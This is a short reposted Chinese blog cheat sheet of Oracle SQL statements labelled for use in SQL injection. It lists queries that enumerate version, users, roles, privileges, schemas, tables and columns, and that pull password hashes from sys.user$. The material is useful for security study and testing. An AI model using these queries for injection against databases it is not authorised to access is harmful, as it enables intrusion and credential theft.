Oracle SQL注入常用语句

解析IP
select utl_inaddr.get_host_address('google.com') from dual;

获取本机IP地址
select utl_inaddr.get_host_address from dual;

根据IP地址反向解析主机名
select utl_inaddr.get_host_name('10.80.18.241') from dual;

-- list version
select banner from v$version where rownum=1 ; -- oracle version

-- list user
select user from dual; -- current user
select username from user_users; -- current user
select username from all_users; -- all user , the current user can see...
select username from dba_users; -- all user , need pris

-- list role
select role from session_roles; -- current role

-- list privs
select privilege from user_sys_privs; -- privs the current user has
select privilege from role_sys_privs; -- privs the current role has
select privilege from session_privs; -- the all privs that current user has = user_sys_privs + role_sys_privs
select * from dba_sys_privs; -- all user's privs , need privs

-- list password hash
select name, password, astatus from sys.user$; -- password hash <=10g , need privs
select name, password, spare4 from sys.user$; -- password has 11g , need privs

-- list database
select global_name from global_name; -- current database
select sys.database_name from dual; -- current database
select name from v$database; -- current database name , need privs
select instance_name from v$instance; -- current database name , need privs

-- list schemas
select distinct owner from all_tables; -- all schema

-- list tables
select table_name from all_tables where owner='xxx'; -- all table name

-- list columns
select owner,table_name,column_name from all_tab_columns where table_name='xxx';
select owner,table_name,column_name from all_tab_cols where table_name='xxx';

本文转自fatshi51CTO博客，原文链接：http://blog.51cto.com/duallay/2050094 ，如需转载请自行联系原作者